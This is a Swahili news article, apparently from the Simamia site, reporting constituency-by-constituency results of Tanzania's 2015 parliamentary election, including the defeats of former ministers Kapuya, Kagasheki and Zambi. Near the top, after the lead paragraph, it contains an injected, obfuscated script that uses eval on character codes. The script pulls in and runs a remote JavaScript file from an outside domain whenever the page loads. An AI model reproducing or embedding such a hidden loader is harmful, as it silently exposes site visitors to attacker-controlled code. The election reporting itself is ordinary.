Recent Comments

Kapuya, Kagasheki na Zambi watupwa nje

By Baraka Bitariho Oct 28, 2015
<p>Mgombea ubunge wa jimbo la Bukoba Mjini kupitia CCM, Balozi Khamis Kagasheki ameangushwa katika jimbo hilo</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mgombea ubunge wa jimbo la Bukoba Mjini kupitia CCM, Balozi Khamis Kagasheki ameangushwa katika jimbo hilo
Mgombea ubunge wa jimbo la Bukoba Mjini kupitia CCM, Balozi Khamis Kagasheki ameangushwa katika jimbo hilo

WAZIRI katika Serikali ya Awamu ya Nne, Godfrey Zambi pamoja na waliokuwa mawaziri katika Serikali hiyo, Profesa Juma Kapuya na Balozi Khamis Kagasheki ni miongoni mwa wabunge waliotupwa nje katika matokeo ya ubunge yanayoendelea kutolewa baada ya Uchaguzi Mkuu wa Jumapili wiki hii.

Mbali ya hao, pia kumekuwa na anguko kwa wabunge wengine maarufu nchini kama Moses Machali wa Kasulu Mjini aliyehamia ACT – Wazalendo akitokea NCCR-Mageuzi, Abbas Mtemvu wa Temeke, Sylvester Kasumbayi wa Chadema (Maswa Mashariki), John Shibuda aliyekuwa Chadema (Maswa Magharibi). Miongoni mwa waliotetea viti vyao ni Dk Faustine Ndugulile (Kigamboni), Halima Mdee (Kawe), William Ngeleja (Sengerema), Peter Serukamba akiwa jimbo jingine la Kigoma Kaskazini), Mussa Zungu (Ilala), Andrew Chenge (Bariadi), Aeshi Hilaly (Sumbawanga Mjini), Aziz Abood (Morogoro Mjini).

Sura mpya ni pamoja na Saed Kubenea (Ubungo), Joseph Haule ‘Profesa Jay’ (Mikumi), Suzan Kiwanga (Mlimba), Magdalena Sakaya (Kaliua), Waitara Mwita (Ukonga) na Nape Nnauye (Mtama). Mkoa wa Dar es Salaam Jimbo la Ubungo Mwanahabari Said Kubenea (Chadema) ametangazwa mshindi katika Jimbo la Ubungo baada ya kupata kura 87,666, akimshinda mpinzani wake wa karibu, Didas Masaburi wa CCM aliyepata kura 59,514.

Jimbo la Kigamboni Mgombea wa CCM, Dk Faustine Ndugulile ameshinda kwa kupata kura 37,917 dhidi ya kura 33,968 za mgombea wa Chadema, Lucy Magereli. Jimbo la Ilala Mussa Azzan Zungu (CCM) ametetea kiti chake cha ubunge baada ya kutangazwa mshindi kwa kura 35,818 dhidi ya mpinzani wake wa karibu, Muslim Hassanali, wa Chadema aliyepata kura 32,333.

Jimbo la Ukonga Mgombea wa Chadema wa Jimbo la Ukonga, Waitara Mwita ameibuka mshindi kwa kupata kura 83,387 dhidi ya mpinzani wake wa karibu, aliyekuwa diwani wa kata ya Gongo la Mboto na Meya wa Manispaa ya Ilala, Jerry Silaa aliyepata kura 76,975. Temeke Aliyekuwa mbunge kupitia CCM, Abbas Mtemvu ameangushwa na mgombea wa CUF, Abdallah Mtolea aliyeshinda kwa kura 103,231 dhidi ya Mtemvu aliyepata kura 97,557.

Mkoa wa Shinyanga Jimbo la Bariadi Katika jimbo hili, mgombea ubunge wa CCM, Andrew Chenge ameshinda kwa kupata kura 79,095 huku Godwin Simba wa Chadema, akipata kura 63,448, Isaack Cheyo wa UDP kura 621, Masunga Nghonzo wa ACT-Wazalendo kura 671 na Joseph Malis wa DP ameambulia 541. Mkoa wa Lindi Jimbo la Mtama Nape Nnauye wa CCM ameshinda kwa kupata kura 28,110 huku mpinzani wake wa karibu Selemani Mathew (Chadema) amepata kura 13,918, Isihaka Mchinjita wa CUF kura 10,547.

Walioandikishwa ni 73,736 kati ya hao waliopiga kura ni 51,903. Jimbo la Mchinga Mgombea ubunge wa Chama cha Wananchi (CUF), Hamidu Bobali alishinda kwa kupata kura 14,779, Saidi Mtanda wa CCM alipata kura 13,165. Mkoa wa Katavi Jimbo la Katavi Mgombea wa CCM, Issack Kamwele alishinda baada ya kujinyakulia kura 8,956 akifuatiwa na George Shambwe (Chadema) aliyepata kura 3,491 na Lucas Pinda (ACT– Wazalendo) aliyepata kura 566. Jimbo la Mpanda Mjini Sebastian Kapufi wa (CCM) ameshinda kwa kujizolea kura 29,193.

Mgombea wa Chadema, Jonas Kalinga kura 18,649, Galus Mgawe (ACT –Wazalendo ) kura 1,447 na Mussa Abdallah (ADC) kura 228. Jimbo la Mpanda Vijijini Mgombea wa CCM, Moshi Kakoso ametetea kiti hicho baada ya kupata kura 30,712 akifuatiwa na Mussa Masanja (Chadema ) kwa kura 16,454. Annastella Malack wa ACT –Wazalendo kura 2,854. Jimbo la Nsimbo NEC imemtangaza Richard Mbogo wa CCM kuwa mshindi baada ya kupata kura 30,392, akifuatiwa na mwandishi wa habari gazeti la The Guardian, Gerald Kitabu (Chadema ) kura 6,879.

Elias Kifunda wa ACT–Wazalendo kura 366. Mkoa wa Rukwa Jimbo la Sumbawanga Mjini Aeshi Hilaly (CCM) ametetea kiti chake baada ya kupata kura 41,763, akimshinda mpinzani wake wa karibu mfanyabiashara maarufu, Ikuwo Malila (Chadema) aliyepata kura 36,183 . Mkoa wa Mbeya Jimbo la Kyela Dk Harison Mwakyembe (CCM) ameshinda kwa kupata kura 44,269 na Abraham Mwanyamaki (Chadema) kura 38,375, Samwel Andrea (ACT) kura 275 na Zamoyoni Peter (DP) kura 201.

Jimbo la Rungwe Henry Saul (CCM) ameshinda kwa kupata kura 44,745, akifuatiwa na John Mwambigija (Chadema) kura 43,613. Farank George (ACT) 1,042, Nicodemas Ngwala (DP) 620, Fredy Mwandembe (UDP) 419. Jimbo Ileje Janeth Mbene (CCM) alishinda akipata kura 27,582, Emmanuel Mbuba (NCCR-Mageuzi) 14,578, Nuru Magiji (ACT) 654.

Jimbo la Mbarali Pirmohamed Mulla (CCM) alishinda kwa kupata kura 45,352, Liberatus Mwang’ombe (Chadema) 36,603, Modest Kirufi (ACT) 20,606. Jimbo la Busokelo Mgombea wa CCM, Atupele Mwakibete ameshinda kwa kupata kura 20,206, Boniface Mwabukusi (Chadema) 12,807, Gwandumi Mwakatobe (ACT) 261 na Ambakisye Mwakifwange (TLP) kura 204. Jimbo la Mbozi Paschal Haonga (Chadema) alishinda akipata kura 36,362,Godfrey Zambi(CCM) 34,586, Julius Mwanitega (ACT) 732.

Jimbo la Vwawa Japhet Hasunga (CCM) alishinda kwa kupata kura 36,705, Fanuel Mkisi(Chadema) 35,400 na Rose Mwashambwa (ACT) 502. Jimbo la Tunduma Katika jimbo hili, Frank Mwakajoka(Chadema) alishinda kwa kupata kura 32,442, Frank Sichalwe (CCM) 17,220, Reddy Makuba (ACT) 319 na James Mwakalonge (TLP) 85. Jimbo la Momba David Silinde (Chadema) alishinda kwa kura 26,468 dhidi ya mbunge wa zamani wa Mbozi Magharibi, Dk Lucas Siyame (CCM) aliyepata kura 26,260 na Weston Simwelu wa ACTWazalendo) kura 1,156.

Jimbo la Lupa Victor Mwambalaswa (CCM) ameshinda kwa kura 32,413, akifuatiwa na Njelu Kasaka (Chadema) kura 22,147 na Muhamed Hussen (ACTWazalendo) aliyepata kura 3,907. Jimbo la Songwe Aliyewahi kuwa Naibu Waziri wa Elimu na Mafunzo na Ufundi, Filipo Mulugo(CCM) ameshinda kwa kupata kura 29,814 akimshinda mpinzani wake Mpoki Mwakisu (Chadema) aliyepata kura 16,165.

Mkoa wa Mwanza Jimbo la Sengerema Mgombea wa CCM, William Ngeleja ameshinda kwa kupata kura 54,887, akifuatiwa na mgombea Chadema, Tabasamu Mwagao aliyepata kura 38,591. Idadi ya waliojiandikisha ni 152,997 na waliopiga kura ni 104,108. Kura halali ni 98,421 na zilizoharibika ni 5,687. Jimbo la Ilemela Mkoa wa Ruvuma Jimbo la Nyasa Mgombea wa CCM Jimbo la Nyasa, Stella Manyanya ameibuka mshindi kwa kupata kura 31,548.

Mgombea wa Chadema, Mgwata Saulo amepata kura 12,653. Idadi ya wapiga kura ni 70,766 na waliopiga kura ni 45,838. Jimbo la Songea Mjini Mgombea wa CCM, Leonidas Gama ameshinda kwa kupata kura 40,886 akifuatiwa na mgombea wa Chadema , Joseph Fuime aliyepata kura 37,012. Jimbo la Madaba Mshindi ni Joseph Mhagama wa CCM aliyepata kura 12,736 baada ya kumshinda mpinzani wake wa karibu, Edson Mbogoro aliyepata kura 5,649.

Jimbo la Peramiho Jenista Mhagama wa CCM ametetea jimbo hilo kwa ushindi wa kura 32,057 . Mkoa wa Tanga Jimbo la Muheza Balozi Adadi Rajabu ambaye ni mgombea wa CCM, ameibuka mshindi kwa kupata kura 54, 417 akifuatiwa na mgombea wa Chadema, Ernest Msigwa aliyepata kura 20,208. Katika jimbo hili, kata 35 zimechukuliwa na CCM kati ya kata 37 zilizopo. Jimbo la Handeni Vijijini Mboni Mhita (CCM) ameshinda kwa kura 45,951 na mgombea wa Chadema, Haji Mwinkalo amepata kura 9,730. Katika kata 21 za jimbo hilo, 20 zimechukuliwa na CCM.

Mkoa wa Morogoro Jimbo la Morogoro Mjini Abdulaziz Abood (CCM), ametetea kiti chake kwa kupata kura 99,748. Marcussy Albanie wa Chadema alipata kura 49,504 na mgombea wa ACTWazalendo, Seleman Msindi ‘Afande Sele’ alipata kura 1,979. Jimbo la Mikumi Mwanamuziki wa kizazi kipya, Joseph Haule ‘Profesa J’ (Chadema) ameibuka mshindi kwa 32,259. Mgombea wa CCM, Jonas Nkya alipata kura 30,425. ACT –Wazalendo kura 1,014 na PDP akipata kura 346. Jimbo la Kilosa Kati Mgombea wa CCM, Mohamed Bawazir alishinda baada ya kupata kura 55,703. Rajab Msabaha wa Chadema alipata kura 19,632.

Jimbo la Gairo Ahmed Shabiby (CCM) alitangazwa Mbunge mteule kwa ushindi wa kura 42,212. Mpinzani wake pekee Salim Mpanda wa Chadema alipata kura 9,969. CCM pia imenyakua kata zote 18 za jimbo hilo. Jimbo la Mlimba Mwenyekiti wa Chadema Mkoa wa Morogoro na Mbunge wa Viti Maalumu aliyemaliza muda wake, Suzan Kiwanga ameshinda kwa kupata kura 40,068. Mpinzani wake wa karibu, Godwin Kunambi wa CCM amepata 34,883.

Jimbo la Kilombero Peter Lijualikali wa Chadema ameshinda kiti cha ubunge kwa kupata kura 62,158 wakati mpinzani wake wa karibu, Abubakar Assenga wa CCM amepata kura 44,092. Jimbo la Mvomero Suleiman Murad wa CCM ameshinda kiti cha Ubunge kwa kupata kura 67,190 huku Oswald Mlay wa Chadema akipata kura 32,797. Jimbo la Morogoro Kusini Mashariki Mgombea wa CCM, Mgumba Omary ameshinda kwa kura 27,940 na kumshinda mshindani wake wa karibu, Salama Awadh wa CUF aliyepata kura 13,823.

Jimbo la Morogoro Kusini Prosper Mbena wa CCM ameshinda kwa kupata kura 36,909 wakati mgombea wa Chadema , Chanzi Joseph akipata kura 11,406. Mkoa wa Manyara Jimbo la Babati Vijijini Mgombea wa CCM, Jitu Soni ameshinda kwa kura 56,843 akifuatiwa na mgombea wa Chadema, Tara Surumbu aliyepata kura 52,683. Jimbo la Hanang Dk Mary Nagu wa CCM ametangazwa mshindi kwa kura 51,697 dhidi ya mgombea wa Chadema, Rashid Magoma aliyepata kura 43,841.

Jimbo lina kata 33, CCM imeshinda kata 21, Chadema kata 10, ACT moja na CUF moja. Jimbo la Kiteto Emanuel Papian wa CCM alipata kura 43,199 na kuibuka mshindi. Mgombea wa Chadema, Athumani Kidawa alipata kura 27,930. Jimbo la Mbulu Paulo Isaay (CCM) alishinda kwa kupata kura 20,522 kati ya kura 47109 zilizopigwa. Paulo Sulle (Chadema) amepata kura 20306. Fratei Maasay alitangazwa mshindi Jimbo la Mbulu.

Mkoa wa Kagera Jimbo la Bukoba Vijijini Jason Rweikiza wa CCM amepata kura 70,183, Siliakusi Rutashobywa (Chadema) kura 22,110, Abdulwakil Rushaka wa ACT-Wazalendo kura 1,020 na Buberwa Kaiza wa CUF kura 4467. Jimbo la Karagwe Innocenti Bashungwa wa CCM amepata kura 57,322, Princepius Rwazo Chadema kura 45,147, Kahangwa Jovin wa TLP kura 1,745 na Ruhinda Kalemera wa UDP kura 147.

Jimbo la Kyerwa Mgombea wa CCM, Innocent Bilakwate alishinda kwa kura 46,040. Benedict Mutungulehi wa Chadema amepata kura 43,192. Jimbo la Nkenge Balozi Dk Diodorus Kamala wa CCM ameshinda kwa kura 39,769,Valerian Rugarabamu (Chadema) kura 27,848, Evance Kamenge (ACT-Wazalendo) kura 651, Salum Bagachwa (CUF) kura 22 na Kweyamba Ishengoma (TLP) kura 71.

Jimbo la Muleba Kusini Profesa Anna Tibaijuka wa CCM ameshinda kwa kura 64,120, Anatory Kashasila (Chadema) kura 53,405, Rwakalela Cronery (ACT-Wazalendo) kura 694 na Anania Rushoju (NCCR Mageuzi) kura 418. Jimbo la Muleba Kaskazini Charles Mwijage wa CCM amepata kura 41,192 huku mpinzani wake Ansbert Ngurumo akipata kura 19,396. Jimbo la Biharamulo Magharibi Mukasa Oscar (CCM) amepata kura 41,879, Dk Mbasa Gervas wa Chadema kura 27,332, Kabuye Phares ( ACT-Wazalendo) kura 4,540. Jimbo la Ngara Mgombea wa CCM, Alex Gashaza ni mshindi kwa 53,387.

Peter Bujari wa Chadema kura 35,254, Helena Adrian wa NCCR-Mageuzi kura 997 na Dotto Bahemu wa ACT- Wazalendo kura 440. Jimbo la Bukoba Mjini Wilfred Rwakatare wa Chadema kapata kura 28,112, dhidi ya Balozi Khamis Kagasheki wa CCM aliyepata kura 25,565. Mastawili Fahami wa ACT-Wazalendo kura 453 na Ndibalema Osward wa TLP kura 81.

Mkoa wa Mara Jimbo la Mwibara Mgombea wa CCM, Kangi Lugola, ametetea jimbo kwa kupata kura 33,845 na kumshinda mpinzani wake kwa karibu Chiriko Haruni wa Chadema aliyepata kura 6,675. Jimbo la Bunda Vijijini Mgombea wa CCM, Boniphace Getere, alitangazwa mshindi baada ya kupata kura 12,589. Suleiman Daud wa Chadema alipata kura 7,547, Maximillian Madoro wa DP kura 5,697 na Ramadhani wa ACT-Wazalendo kura 398.

Jimbo la Butiama Mbunge aliyemaliza muda wake, Nimrod Mkono kupitia CCM, ametetea ubunge kwa ushindi wa kura 47,467 sawa asilimia 75.46 ya kura zote. Jimbo la Rorya Lamek Airo ameshinda ubunge kwa kupata kura 57,914 na kumshinda Stephen Owawa wa Chadema aliyepata kura 42, 532 . Mkoa wa Kigoma Jimbo la Kigoma Kaskazini Peter Serukamba wa CCM ameshinda kwa kura 32,275 dhidi ya kura 14,685 za mgombea wa Chadema Dk Yared Fubusa.

Jimbo la Kasulu Vijijini Mgombea wa CCM, Augustino Vuma ameshinda kwa kura 36,940 na kumshinda aliyekuwa mbunge wa jimbo hilo, Zaitun Buyogera wa NCCR – Mageuzi aliyepata kura 19,941. Thomas Msasa wa ACT-Wazalendo amepata kura 14.464. Jimbo la Muhambwe Atashasta Nditiye (CCM) ameshinda kwa kupata kura 27,225 akimbwaga aliyekuwa mbunge wa jimbo hilo Felix mkosamali wa NCCR – Mageuzi aliyepata kura 21,630.

Mkoa wa Rukwa Jimbo la Nkasi Kaskazini Deuderius Mipata wa CCM ameshinda ubunge kwa kupata kura 19,426 dhidi ya mpinzani wake wa karibu, Sotoka Daniel (Chadema ) aliyepata kura 16,265. Jimbo la Nkasi Kusini Mbunge aliyemaliza muda wake, Ally Keisy wa CCM ameshinda kwa kura 23,379 akifuatiwa kwa karibu na mgombea wa Chadema, Kessy Sudy aliyepata kura 21,565.

Mkoa wa Mtwara Jimbo la Newala Mjini Mgombea wa CCM, George Mkuchika ameshinda kwa kupata kura 18,817 na kumshinda mshindani wake wa karibu, Juma Manguya wa CUF aliyepata kura 18,261. Mkoa wa Singida Singida Kaskazini Waziri wa Maliasili na Utalii, Lazaro Nyalandu (CCM) ameshinda kwa kura 42,191 sawa na asilimia 66.9 ya kura zote akifuatiwa na David Djumbe wa Chadema aliyepata kura 20,264.

Iramba Magharibi Naibu Waziri wa Fedha, Mwigulu Nchemba ameshinda kwa kupata kura 55,213 sawa na asilimia 81 ya kura halali zilizopigwa. Mshindani wake wa karibu, Jesca Kishoa wa Chadema, amepata kura 12,957. Mkoa wa Tabora Jimbo la Igunga Mbunge wa Igunga aliyemaliza muda wake, Dk Dalaly Kafumu ametetea kiti chake baada ya kuibuka mshindi kwa kura 32, 830 na kuwaacha wagombea wengine kwa kura zisizopungua 10,609.

Anafuatiwa na Luganda Kube wa Chadema aliyepata kura 22,221. Jimbo la Kaliua Profesa Juma Kapuya ameangushwa na Naibu Katibu Mkuu wa Chama cha Wananchi (CUF), Magdalena Sakaya kwa kupata kura 21,982 dhidi ya kura 20,399 za Profesa Kapuya. Jimbo la Ulyankulu Mgombea wa CCM, John Kadutu ameshinda kuwa Mbunge wa kwanza wa jimbo hilo jipya kwa kupata kura 32,723 akifuatiwa kwa mbali na mgombea wa Chadema, Deus Kitanyapondya aliyepata kura 9,432.

Jimbo la Tabora Mjini Emanuel Mwakasaka wa CCM kuwa mshindi baada ya kupata kura 44,411 akifuatiwa na Peter Mkufya 35,452. Jimbo la Nzega Mjini Hussein Bashe wa CCM ameshinda kura 14,774 akifuatiwa na mgombea wa Chadema, Charles Mabula kura 9,658. Jimbo la Nzega Vijijini Mgombea wa CCM, Dk Hamis Kigwangala ameshinda kwa kura 31,554 dhidi ya Joseph Malongo wa Chadema kura 10,404.

Jimbo la Bukene Selemani Zedi wa CCM alitetea kiti chake kwa kura 30,998 dhidi ya mgombea wa Chadema, Elias Maiko kura 13,704. Jimbo la Urambo Margaret Sitta ametangazwa kuwa mbunge wa jimbo hilo kwa kura 31,022 dhidi ya mgombea wa Chadema, Samwel Ntakamulenga aliyepata kura 26,857. Jimbo la Manonga Mgombea wa CCM, Seif Gulamali alishinda kwa kura 31,485 dhidi ya 14,220 za mgombea wa Chadema.

Jimbo la Igalula Mgombea wa CCM, Mussa Ntimizi alipata kura 26,369 akifuatiwa na mgombea wa Chadema, Maganga William aliyepata kura 5,147. Jimbo la Tabora Kaskazini, mgombea wa CCM, Almas Maige alipata kura 32,792 akifuatiwa na Joseph Kidaha aliyepata kura 16,553 wa Chadema. Jimbo la Sikonge George Kakunda ameshinda kwa 31,344 dhidi ya mgombea wa Chadema, Haji Chambala kura 18,317.

Mkoa wa Pwani Jimbo la Chalinze Mgombea ubunge, Ridhiwani Kikwete ameshinda kwa kupata kura 52,700 na kumshinda mpinzani wake wa karibu, Mathayo Torongei wa Chadema aliyepata kura 20,153. Jimbo la Kibaha Mjini Silvestry Koka wa CCM ameshinda kwa kupata kura 31,462 wakati mgombea wa Chadema, Dk Michael Mtali akipata kura 24,860. Mkoa wa Shinyanga Jimbo la Solwa Mshindi wa ubunge ni Ahmed Salum wa CCM aliyepata ushindi wa kura 57,962 sawa na asilimia 64.

Mgombea wa Chadema, Mshandete Richard amepata kura 30,648. Jimbo la Maswa Mashariki Stanslaus Nyongo ameshinda kwa kura 34,746 dhidi ya Slivester Kasulumbayi (Chadema) aliyepata kura 19,209. Maswa Magharibi Mshindi ni Mashimba Ndaki aliyepata kura 76,150 akiwashinda wengine akiwemo mbunge aliyemaliza muda wake jimboni humo, John Shibuda (ADA TADEA).

Jimbo la Busega Dk Chegeni Raphael (CCM) ameshinda kwa kupata kura 40,977 na kufuatiwa na David William (Chadema) aliyepata kura 26,995. Jimbo la Itilima Njalu Silanga (CCM) ameshinda kwa kura 55,850 na kuwashinda Martin Makondo (CUF) aliyepata kura 28,000. Jimbo la Bariadi Andrew Chenge (CCM) ameshinda kwa kura 79,095 akifuatiwa na Godwin Simba (Chadema) aliyepata kura 63,448.

Mkoa wa Arusha Jimbo la Ngorongoro Mshindi wa kiti cha ubunge ni William ole Nasha aliyepata kura 29,419 dhidi ya mpinzani wake wa karibu, Elias Ngorisa wa Chadema aliyepata kura 23,979. Jimbo la Longido Mgombea Ubunge wa Chadema, Onesmo ole Nangole amewashinda mgombea wa CCM, Dk Steven Kiruswa. Mkoa wa Dodoma Kondoa Mjini Edwin Sanda wa CCM ameshinda kwa kupata kura 13,333 na kumshinda Ally Kambi wa CUF aliyepata kura 6,783.

Kondoa Vijijini Mshindi ni Dk Kashatu Kijaji (CCM) aliyeshinda kwa kura 37,973. Jimbo la Chemba Juma Nkamia wa CCM ameshinda kwa kupata kura 50,233. Jimbo la Mtera Livingstone Lusinde wa CCM maarufu kama Kibajaji, ameshinda kwa kura 47,147 akifuatiwa na Christopher Nyamwanji wa Chadema aliyepata kura 6,275. Jimbo la Dodoma Mjini Mshindi ni Anthony Mavunde kwa kumbwaga mgombea wa Chadema, Benson Kigaila.

Jimbo la Mpwapwa George Lubeleje ameshinda kwa kura 32,208. Jimbo la Kibakwe George Simbachawene ameshinda kwa kupata kura 37,327 sawa na asilimia 81. Jimbo la Kongwa Aliyeshinda ni Job Ndugai aliyepata kura 73,163 sawa na asilimia 76.8 . Mkoa wa Iringa Iringa Mjini Mshindi ni Mchungaji Peter Msigwa wa Chadema, aliyepata kura 43,154 akifuatiwa na Frederick Mwakalebela aliyepata kura 32,406.

OP Habari Leo

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com